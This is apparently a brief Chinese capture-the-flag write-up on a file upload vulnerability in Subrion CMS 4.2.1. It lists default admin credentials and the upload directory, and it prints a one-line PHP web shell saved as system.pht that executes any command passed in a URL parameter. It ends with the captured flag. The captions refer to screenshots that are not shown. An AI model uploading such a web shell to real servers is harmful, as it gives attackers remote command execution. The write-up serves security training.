当先锋百科网

首页 1 2 3 4 5 6 7

一、题目

 靶标介绍:

Subrion CMS 4.2.1 存在文件上传漏洞

进入题目:

admin/admin 

  点击设置:

 后台管理主页:

 上传页面:

上传目录:

/panel/uploads/

  查看上传位置:

system.pht

<?php system($_GET[1]);phpinfo();?>

 上传位置:

 uploads/system.pht

 flag{24505f02-d430-4d3b-905e-17349e09c34c}